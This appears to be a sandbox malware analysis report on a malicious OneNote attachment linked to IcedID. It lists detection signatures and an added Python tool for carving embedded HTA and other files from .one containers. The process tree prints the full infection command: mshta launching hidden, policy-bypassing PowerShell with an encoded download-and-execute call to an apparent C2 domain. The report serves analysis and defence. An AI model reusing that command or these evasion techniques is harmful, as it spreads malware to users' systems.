Windows Analysis Report


General Information

Sample Name:Inv_02_02_#6.one
Analysis ID:797394




Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
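The first signature in the list above fires on the OneNote container itself. The following Python is an added example for this page, not Joe Sandbox's Yara rule and not code from the sample: it scans a .one blob for MS-ONESTORE FileDataStoreObject records (the framing OneNote uses for embedded attachments) and carves each payload, which is the step that gets an embedded HTA such as the Open.hta later run by mshta.exe out of the notebook. The header and footer GUIDs and the .one file-type GUID are the ones defined in the MS-ONESTORE specification; the file assembled by build_sample_one() and its HTA text are constructed for the example and are not the report's Inv_02_02_#6.one or Open.hta.

```python
import struct
import sys

# MS-ONESTORE FileDataStoreObject framing, GUIDs written as they appear on disk (little-endian).
FDSO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")  # {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FDSO_FOOTER = bytes.fromhex("22A7FB71790F0B4ABB13899256426B24")  # {71FBA722-0F79-4A0B-BB13-899256426B24}
ONE_MAGIC = bytes.fromhex("E4525C7B8CD8A74DAEB15378D02996D3")    # .one guidFileType {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}
FDSO_PREAMBLE = 16 + 8 + 4 + 8  # guidHeader + cbLength (u64) + unused (u32) + reserved (u64)


def is_onenote(blob: bytes) -> bool:
    return blob.startswith(ONE_MAGIC)


def classify(payload: bytes) -> str:
    """Content sniff sufficient to separate a dropped HTA/script from a PE or an image."""
    head = payload[:4096].lower()
    if payload.startswith(b"MZ"):
        return "pe"
    if b"<hta:application" in head:
        return "hta"
    if b"<script" in head or b"<html" in head:
        return "html"
    if payload.startswith(b"\x89PNG"):
        return "png"
    if payload.startswith(b"%PDF"):
        return "pdf"
    return "unknown"


def carve_embedded_files(blob: bytes) -> list:
    """Return every FileDataStoreObject found by scanning for the header GUID."""
    objs = []
    pos = 0
    while (idx := blob.find(FDSO_HEADER, pos)) != -1:
        if idx + FDSO_PREAMBLE > len(blob):
            break
        (cb_length,) = struct.unpack_from("<Q", blob, idx + 16)
        start = idx + FDSO_PREAMBLE
        end = min(start + cb_length, len(blob))   # clamp: a corrupt cbLength must not read past EOF
        payload = blob[start:end]
        objs.append({
            "offset": idx,
            "declared_length": cb_length,
            "truncated": start + cb_length > len(blob),
            # The footer GUID follows the data (possibly after alignment padding); no footer
            # within a short window usually means a truncated or hand-built object.
            "footer_ok": blob.find(FDSO_FOOTER, end, end + 24) != -1,
            "kind": classify(payload),
            "payload": payload,
        })
        pos = max(end, idx + 16)
    return objs


def build_sample_one() -> bytes:
    """Constructed stand-in for a malicious .one: file GUID, filler, one embedded HTA object.
    The HTA text is made up for this example; it is not the report's Open.hta."""
    hta = (b'<html><head><HTA:APPLICATION ID="o" WINDOWSTATE="minimize" SHOWINTASKBAR="no"/>'
           b'<script language="VBScript">Set sh = CreateObject("WScript.Shell")</script></head></html>')
    obj = FDSO_HEADER + struct.pack("<Q", len(hta)) + b"\x00" * 12 + hta + FDSO_FOOTER
    return ONE_MAGIC + b"\x00" * 48 + obj + b"\x00" * 16


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_one()
    print("onenote header:", is_onenote(data))
    for o in carve_embedded_files(data):
        print(f"offset=0x{o['offset']:x} len={o['declared_length']} kind={o['kind']} "
              f"footer_ok={o['footer_ok']} truncated={o['truncated']}")
        if o["kind"] in ("hta", "html"):
            print("   ", o["payload"][:120])
```

Run it with a path to a .one file to list the embedded objects; with no argument it runs on the constructed sample. Scanning for the header GUID rather than walking the notebook's object structure is deliberate: it still works when the file is damaged or only partially recovered from a sandbox, which is also why each record reports whether the declared length overran the file and whether the footer GUID was found.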


  • System is w10x64
  • ONENOTE.EXE (PID: 1972 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one" MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • ONENOTEM.EXE (PID: 2040 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • mshta.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)